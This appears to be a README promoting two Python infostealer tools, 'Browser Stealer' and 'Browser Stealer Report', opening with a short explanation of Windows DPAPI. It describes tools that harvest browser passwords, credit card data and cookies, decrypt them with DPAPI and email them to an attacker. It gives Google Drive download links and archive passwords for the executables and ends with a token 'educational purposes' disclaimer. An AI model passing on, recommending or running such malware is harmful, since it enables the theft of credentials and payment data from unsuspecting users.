Data Protection Application Programming Interface (DPAPI)

DPAPI is a simple cryptology programming interface that comes bundled with operating systems in later versions starting with Windows 2000. In theory the Data Protection API can enable symmetric encryption of any kind of data; in practice, its primary use in the Windows operating system is to perform symmetric encryption of asymmetric private keys, using a user or system secret as a significant contribution of entropy.

What does DPAPI protect?

DPAPI is utilized to protect the following personal data:

-Passwords and form auto-completion data in Internet Explorer, Yandex, Google "Chrome", etc.

-E-mail account passwords in Outlook, Windows Mail, etc.

-Shared folders and resources access password

-Internal FTP manager account passwords

-Outlook for S/MIME

-Wireless network account keys and passwords

-Private keys for Encrypting File System (EFS), SSL/TLS in Internet Information Services

-Network passwords in Credential Manager

-Personal data in any application protected with the API function.

Why is DPAPI important for cybersecurity?

Information stored in applications is decrypted using DPAPI. In this way, attacker passwords may be captured. For use in attack scenarios, two applications written in Python language have been developed that steal the information stored in internet browsers.

-Browser Stealer

-Browser Stealer Report

Browser Stealer

Finds Internet browsers and applications that use those browsers. It detects files that hold personal information such as username and password, and credit card information. It decrypts these files using DPAPI. It transmits this information to the attacker via email.

For more information.

Screenshot [1]

(Executable) Browser Stealer Download

Browser_Stealer.rar --> zip password: "BrOWserSteaLEr2022"

Link = https://drive.google.com/file/d/1Q2XkhU64vHzKfyxmuPh-c9U3JdoqFeyS/view?usp=sharing

Browser Stealer Report

Finds internet browsers and applications that use those browsers. It detects files containing personal information such as username and password, credit card information and cookies. It decrypts these files using DPAPI. It saves this information in an excel file named "Report.xls".

For more information.

Screenshot [1]

Screenshot [2]

(Executable) Browser Stealer Report

Browser_Stealer_Report.rar --> zip password: "BroWSerSteaLErRePOrt2022"

Link = https://drive.google.com/file/d/13ZrjFqpua_BijbaE52RQ2gfCPX65Mubh/view?usp=sharing

Legal Warning

Run your tests on virtual machines. The responsibility for illegal use belongs to the user. Shared for educational purposes.